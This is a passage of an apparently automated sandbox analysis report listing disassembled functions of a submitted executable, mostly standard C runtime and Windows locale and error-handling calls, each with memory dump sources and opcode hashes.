                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: GetLastError.KERNEL32(?,00000008,003D89CA), ref: 003D42B5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003D42B1: SetLastError.KERNEL32(00000000,003ED3A8,00000024,003CFBA9), ref: 003D4357
                                                                                                                                                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(003DBE80,00000001,?,?,?,003DC6EB,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 003DBF5E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2417226690-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2cff79d027d8b11629adb30888b2b01855c8d78f6a629d30b77c5205d54ce93e
                                                                                                                                                                                                                                                                                                  • Instruction ID: a340ec1f3f708c0bed9d1632b859174b57be16123dcf985b9b0bf7263af55a07
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2cff79d027d8b11629adb30888b2b01855c8d78f6a629d30b77c5205d54ce93e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 76F0A03B30020597CB16AF36E8566AABB98EFC1760B07405AEB058B791C6729842CB90
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003D57D9 Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,?,?,003D1DEC,?,20001004,00000000,00000002,?,?,003D13EE), ref: 003D580D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 918cd97a3be4c631cb364f5b967caa2544d13137c700595179e4c9f82ba41cc7
                                                                                                                                                                                                                                                                                                  • Instruction ID: 3f0690b3393055384fa367c20f7fc2bd289c29bfd0f0e0173de2a66b0fea9559
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 918cd97a3be4c631cb364f5b967caa2544d13137c700595179e4c9f82ba41cc7
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BEE04F33600A58BBCF232F61FC05EAE7E19EF447A1F114022FD156A261CB718D30AA94
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C693B Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(Function_00006947,003C5DE2), ref: 003C6940
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: d986bb263fdce56846e2bd6336eb699289049f8356a789a458ecaa41f36ec013
                                                                                                                                                                                                                                                                                                  • Instruction ID: 617008ba631a30d2dd095520eed145af76767da0ebcb2840891a66d35d09ad46
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d986bb263fdce56846e2bd6336eb699289049f8356a789a458ecaa41f36ec013
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003DC84B Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 0d4186c31d048dbc234201f7fd5e8cefd90001a69b3cf21c152bcb9025c7258e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 1622475b3daceaef53350da22ef4891cd2d450778bda095a9b44f0e443443669
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0d4186c31d048dbc234201f7fd5e8cefd90001a69b3cf21c152bcb9025c7258e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27A012B03011008B4B108F315A0420875A8A54D2827008035A000C4160E63440409604
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003DB736 Relevance: .3, Instructions: 327COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLastProcess$CurrentFeatureInfoLocalePresentProcessorTerminate
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 3471368781-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9dd4c8c8499c83a13a51ddc50a0fba5df3948b5f62b26bd706e590f148ff28ba
                                                                                                                                                                                                                                                                                                  • Instruction ID: 6c62512c608d0fd381e05e0d3142ca0d7dc9e26c9507bd45fb022f5b8edec050
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9dd4c8c8499c83a13a51ddc50a0fba5df3948b5f62b26bd706e590f148ff28ba
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E4B1E577500745CBDB369B25DC92ABBF3A8EF44308F16452FEA4386780EB75A941C710
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C9438 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • type_info::operator==.LIBVCRUNTIME ref: 003C9557
                                                                                                                                                                                                                                                                                                  • ___TypeMatch.LIBVCRUNTIME ref: 003C9665
                                                                                                                                                                                                                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 003C97B7
                                                                                                                                                                                                                                                                                                  • CallUnexpected.LIBVCRUNTIME ref: 003C97D2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                                  • API String ID: 2751267872-393685449
                                                                                                                                                                                                                                                                                                  • Opcode ID: f74ad49367718089a84edbd3cc46fa53fa8ebd7950a0b5507fbdb2c06be8cb9c
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5086908528033079b20e19b08d3630b645a43d1e10ee893edc4b6a143d2167a9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f74ad49367718089a84edbd3cc46fa53fa8ebd7950a0b5507fbdb2c06be8cb9c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21B13671800219EFCF26DFA4C989FAEBBB5AF04310F16415EE811AB252D731DE61CB91
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C8ED0 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 003C8F07
                                                                                                                                                                                                                                                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 003C8F0F
                                                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 003C8F98
                                                                                                                                                                                                                                                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 003C8FC3
                                                                                                                                                                                                                                                                                                  • _ValidateLocalCookies.LIBCMT ref: 003C9018
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                                  • String ID: Iv<$csm
                                                                                                                                                                                                                                                                                                  • API String ID: 1170836740-1717667600
                                                                                                                                                                                                                                                                                                  • Opcode ID: ae4726453e02a52d0ba56c89f8ecd97756708fd12769f065bccd3bd7ea99a94b
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7bdb1563ff80904cfe1d606ad36e11930a44feb8fd869537378f993deb293347
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae4726453e02a52d0ba56c89f8ecd97756708fd12769f065bccd3bd7ea99a94b
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6741B330A00218ABCF12DF69D885FDEBBB6AF45324F14815DE814DB392DB719E01CB91
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003E06EA Relevance: 12.2, APIs: 8, Instructions: 248COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(01010520,01010520,?,7FFFFFFF,?,003E09BA,01010520,01010520,?,01010520,?,?,?,?,01010520,?), ref: 003E0790
                                                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 003E084B
                                                                                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 003E08DA
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003E0925
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003E092B
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003E0961
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003E0967
                                                                                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 003E0977
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 127012223-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: c6d6f8c0f29cb5de9c33f7a7c061b8cca11ccd168e64da99589a4e85deabda99
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2ba9c76ddaba616cb11ff4da5bbded59b8a8894891ecb2c8b0adab4d5b745d50
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c6d6f8c0f29cb5de9c33f7a7c061b8cca11ccd168e64da99589a4e85deabda99
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C71EB729003A56BEF2B9F658C41FAE77A99F45310F190219F844BB2D3D7B5AC808B91
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C4457 Relevance: 10.6, APIs: 7, Instructions: 65COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 003C445E
                                                                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 003C4468
                                                                                                                                                                                                                                                                                                  • int.LIBCPMT ref: 003C447F
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::_Lockit.LIBCPMT ref: 003C16C5
                                                                                                                                                                                                                                                                                                    • Part of subcall function 003C16B4: std::_Lockit::~_Lockit.LIBCPMT ref: 003C16DF
                                                                                                                                                                                                                                                                                                  • codecvt.LIBCPMT ref: 003C44A2
                                                                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 003C44B9
                                                                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 003C44D9
                                                                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 003C44E6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_H_prolog3Registercodecvt
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2133458128-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: cf846009966857dece0f9d97ce2b027fb95eb079d1d8ebe3ac31804db7971ec6
                                                                                                                                                                                                                                                                                                  • Instruction ID: a2f7531e84bf49ae8d5db8bf97ab5d691e82ea4cf726b3f713694dc31f66be18
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf846009966857dece0f9d97ce2b027fb95eb079d1d8ebe3ac31804db7971ec6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 531106769002149BCB16EF65D916FAE77B8BF44310F65450DE401EB281DFB09E01C780
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003DEF6F Relevance: 9.3, APIs: 6, Instructions: 298COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                  • Opcode ID: c9ae3e1f7fec0f83688158fab25f181cb430ac816444d5bfc308532940cc5b33
                                                                                                                                                                                                                                                                                                  • Instruction ID: 00f608a4e1bbc43983d9640e456706a355d74f467c44f559a1b67681f4b495bf
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c9ae3e1f7fec0f83688158fab25f181cb430ac816444d5bfc308532940cc5b33
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BCB1277AA042459FDB13DF98E8C0BAEBBB5BF49304F15457AE502AB392C7709D01CB50
                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                  Function 003C90CA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,003C90C1,003C77F5,003C698B), ref: 003C90D8
                                                                                                                                                                                                                                                                                                  • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 003C90E6
                                                                                                                                                                                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 003C90FF
                                                                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(00000000,003C90C1,003C77F5,003C698B), ref: 003C9151
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1666130567.00000000003C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666108577.00000000003C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666152458.00000000003E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666166878.00000000003EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666192621.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666205999.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1666218475.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_3c0000_file.jbxd
                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                  Similarity
